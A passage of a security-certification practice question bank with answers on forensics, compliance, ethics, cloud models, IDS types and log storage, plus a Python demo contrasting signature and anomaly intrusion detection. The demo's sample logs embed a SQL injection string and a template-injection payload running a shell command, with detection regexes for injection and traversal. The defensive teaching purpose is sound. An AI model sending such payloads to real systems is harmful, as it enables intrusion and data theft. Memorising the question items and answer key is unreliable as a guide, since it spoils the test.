91. Answer: D. Have minimal interference (must have the least amount of contamination that is possible) Explanation: While it’s crucial to preserve the integrity of a digital crime scene, it’s also understood that some interaction might be necessary for investigation. The goal is to minimize any changes or contamination.
92. When IT systems are outsourced A. All legal and compliance responsibilities are transferred to the service provider. B. The outsourcing organization no longer has compliance responsibilities. C. The outsourced IT systems are exempt from compliance responsibilities. D. The service provider is exempt from compliance responsibilities.
92. Answer: None of the four options is correct as written; the principle being tested is that the outsourcing organization retains ultimate legal and compliance responsibility, and option A states the opposite. Explanation: While the service provider takes on its own contractual and operational obligations, the outsourcing organization remains accountable to regulators, customers, and the courts for compliance. Responsibility can be shared but not transferred, so the organization must verify, through contracts, audits, and attestations, that any outsourced service meets the required compliance standards.
93. How does the ISC2 Code of Ethics address conflicts between its principles? A. It states that conflicts between principles are impossible. B. It resolves them through a formal adjudication process. C. It uses the order in which the principles are listed. D. It refers all conflicts to its board of directors for resolution.
93. Answer: C. It uses the order in which the principles are listed (the order of the canons). Explanation: The ISC2 Code of Ethics uses the order of its canons (principles) to prioritize and resolve conflicts.
94. To ensure proper forensic procedures are followed when needed, an incident response program should A. Ensure the organization’s legal team is not involved B. Regularly create digital copies of all computers C. Only escalate closed incidents to law enforcement D. Approach every incident as if it might lead to legal action
94. Answer: D. Approach every incident as if it might lead to legal action (treat every incident as though it may be a crime) Explanation: By treating every incident as a potential crime, organizations ensure that evidence is preserved and handled correctly from the outset.
95. If a hard drive is recovered from a submerged vehicle and is needed for a court case, what is the best method to retrieve data from the drive? A. Let the drive dry, install it in a computer, and use standard commands to access the data. B. Dry the drive in a forensic oven, use a degausser to remove humidity, then access the data using a laptop. C. Make a forensic copy of the drive while it’s still wet. D. Contact a professional data recovery service, explain the situation, and ask them to create a forensic image.
95. Answer: D. Contact a professional data recovery service, explain the situation, and ask them to create a forensic image. Explanation: Professional data recovery services have the expertise and equipment to handle such situations. They can ensure that the data is retrieved without further damaging the drive or compromising the integrity of the evidence.
96. Among the listed cloud service models, which one grants an organization the highest degree of administrative control while also necessitating that the organization undertake comprehensive maintenance responsibilities for both the operating systems and applications? A. Infrastructure as a Service (IaaS) B. Platform as a Service (PaaS) C. Software as a Service (SaaS) D. Public Cloud Service
96. Answer: A. Infrastructure as a Service (IaaS) Explanation: Infrastructure as a Service (IaaS) provides an organization with the most control over its cloud resources, including virtual machines, storage, and networking. However, this level of control comes with the responsibility of managing and maintaining the operating systems and applications. Unlike PaaS and SaaS, where the cloud provider takes on more of the management burden, IaaS requires the organization to handle all aspects of maintenance and administration.
98. Which of the following IDS types is best suited for detecting zero-day attacks? A. Signature-based IDS B. Anomaly-based IDS C. Stateful protocol analysis IDS D. Heuristic-based IDS
98. Answer: B. Anomaly-based IDS Explanation: Anomaly-based IDS systems can detect zero-day attacks because they flag deviations from an established baseline of normal behaviour rather than matching known signatures, which by definition do not yet exist for a zero-day. The trade-offs are a higher false-positive rate and a training period during which the baseline must be built from traffic that is known to be clean; an attack present during training becomes part of “normal”.
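To make the contrast concrete, here is an added example (not part of the original question bank) that runs a small signature-based detector and a small anomaly-based detector over the same constructed web-server log lines. The log lines, hosts, paths, signature list, features (request-path length and requests per source address) and thresholds are all assumptions of the example; a real IDS uses far richer features, but the mechanism is the same.

```python
import re
import statistics
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List

# Common-log-format access lines, parsed with one regex.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+)$'
)

# A deliberately small signature set: it knows SQL injection and traversal, nothing else.
SIGNATURES = {
    "sqli-union": re.compile(r"union(%20|\+|\s)+select", re.IGNORECASE),
    "path-traversal": re.compile(r"(\.\./|%2e%2e%2f)", re.IGNORECASE),
}

# Constructed known-good traffic used to build the baseline (hypothetical hosts and paths).
BASELINE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326',
    '10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /static/app.css HTTP/1.1" 200 1120',
    '10.0.0.6 - - [10/Oct/2023:13:55:38 +0000] "GET /about HTTP/1.1" 200 1843',
    '10.0.0.7 - - [10/Oct/2023:13:55:39 +0000] "POST /login HTTP/1.1" 302 0',
    '10.0.0.6 - - [10/Oct/2023:13:55:40 +0000] "GET /products/12 HTTP/1.1" 200 4011',
    '10.0.0.8 - - [10/Oct/2023:13:55:41 +0000] "GET /products/7 HTTP/1.1" 200 3980',
    '10.0.0.7 - - [10/Oct/2023:13:55:42 +0000] "GET /account HTTP/1.1" 200 2210',
    '10.0.0.5 - - [10/Oct/2023:13:55:43 +0000] "GET /static/logo.png HTTP/1.1" 200 8876',
    '10.0.0.8 - - [10/Oct/2023:13:55:44 +0000] "GET /contact HTTP/1.1" 200 1500',
    '10.0.0.6 - - [10/Oct/2023:13:55:45 +0000] "GET /products/3 HTTP/1.1" 200 3990',
]

# Constructed traffic under test: an attack the signatures know (line 0), a template-injection
# attempt they do not (line 1), a benign request (line 2), and an enumeration burst (lines 3-10).
SUSPECT_LOG = [
    '10.0.0.9 - - [10/Oct/2023:14:02:01 +0000] "GET /search?q=%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20users-- HTTP/1.1" 200 512',
    '10.0.0.10 - - [10/Oct/2023:14:02:02 +0000] "GET /api/v1/export?template=%7B%7Bconfig.__class__.__init__.__globals__%5B%27os%27%5D.popen%28%27id%27%29.read%28%29%7D%7D HTTP/1.1" 500 0',
    '10.0.0.5 - - [10/Oct/2023:14:02:03 +0000] "GET /products/9 HTTP/1.1" 200 4002',
] + [
    f'10.0.0.11 - - [10/Oct/2023:14:02:{4 + i:02d} +0000] "GET /products/{i + 1} HTTP/1.1" 200 3900'
    for i in range(8)
]


@dataclass
class Baseline:
    path_len_mean: float
    path_len_std: float
    max_requests_per_ip: int


def parse(lines: List[str]) -> List[Dict[str, str]]:
    """Parse log lines; malformed lines are skipped rather than crashing the detector."""
    parsed = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            parsed.append(m.groupdict())
    return parsed


def signature_alerts(lines: List[str]) -> Dict[int, List[str]]:
    """Signature-based: a line is flagged only if it matches a known attack pattern."""
    alerts: Dict[int, List[str]] = {}
    for i, rec in enumerate(parse(lines)):
        hits = [name for name, rx in SIGNATURES.items() if rx.search(rec["path"])]
        if hits:
            alerts[i] = hits
    return alerts


def build_baseline(lines: List[str]) -> Baseline:
    """Learn what 'normal' looks like from a training window of known-clean traffic."""
    recs = parse(lines)
    lengths = [len(r["path"]) for r in recs]
    per_ip = Counter(r["ip"] for r in recs)
    return Baseline(
        path_len_mean=statistics.mean(lengths),
        path_len_std=statistics.stdev(lengths) if len(lengths) > 1 else 0.0,
        max_requests_per_ip=max(per_ip.values()),
    )


def anomaly_alerts(base: Baseline, lines: List[str], z_threshold: float = 3.0,
                   rate_factor: int = 2) -> Dict[int, List[str]]:
    """Anomaly-based: flag deviations from the baseline with no knowledge of any attack."""
    recs = parse(lines)
    per_ip = Counter(r["ip"] for r in recs)
    alerts: Dict[int, List[str]] = {}
    for i, rec in enumerate(recs):
        reasons = []
        if base.path_len_std > 0:
            z = (len(rec["path"]) - base.path_len_mean) / base.path_len_std
            if z > z_threshold:
                reasons.append("path-length")
        if per_ip[rec["ip"]] > rate_factor * base.max_requests_per_ip:
            reasons.append("request-rate")
        if reasons:
            alerts[i] = reasons
    return alerts


if __name__ == "__main__":
    base = build_baseline(BASELINE_LOG)
    print("signature:", signature_alerts(SUSPECT_LOG))
    print("anomaly:  ", anomaly_alerts(base, SUSPECT_LOG))
```

The signature detector catches only line 0; the anomaly detector also flags the unknown payload on line 1 (its path length is far outside the baseline) and the eight-request burst from a single address (rate well above anything in the baseline), while leaving the benign request on line 2 alone. Running `anomaly_alerts` over the baseline itself produces no alerts, which is the minimum sanity check before deploying any learned threshold.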
97. Which of the following is the most secure method for storing log files? A. On the same server as the application B. On a dedicated logging server C. On removable media D. In a public cloud storage service
97. Answer: B. On a dedicated logging server Explanation: Of the listed options, a dedicated logging server is the most secure because it separates the logs from the system being monitored: an attacker who compromises the application host cannot simply edit or delete its local logs to cover their tracks. In practice this means forwarding logs over an authenticated, encrypted channel (for example syslog over TLS), administering the log server with separate credentials from the hosts it collects from, and restricting the collecting account to append-only writes so that even a compromised sender cannot alter what it has already logged.